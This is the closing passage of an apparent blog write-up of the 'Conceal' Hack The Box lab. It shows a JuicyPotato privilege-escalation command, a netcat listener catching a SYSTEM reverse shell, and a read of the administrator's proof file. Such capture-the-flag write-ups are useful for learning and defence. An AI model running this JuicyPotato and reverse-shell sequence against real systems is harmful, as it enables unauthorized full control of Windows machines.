{6d8ff8df-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8d2-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8dc-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{0fb40f0d-1021-4022-8da0-aab0588dfc8b};NT AUTHORITY\LOCAL SERVICE
{B91D5831-B1BD-4608-8198-D72E155020F7};NT AUTHORITY\SYSTEM

Now we are all set. Let’s execute JuicyPotato.

PS C:\users\destitute> .\JuicyPotato.exe -l 1337 -p c:\users\destitute\rev.bat -t * -c "{47135eea-06b6-4452-8787-4a187c64a47e}"
Testing {47135eea-06b6-4452-8787-4a187c64a47e} 1337
......
[+] authresult 0
{47135eea-06b6-4452-8787-4a187c64a47e};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Your netcat listener catches the system reverse shell. And you are root.!

root@kali:~/htb/conceal# nc -nvlp 444
listening on [any] 444 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.116] 50798
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system
PS C:\Windows\system32> hostname
Conceal
PS C:\Windows\system32> type c:\users\administrator\desktop\proof.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s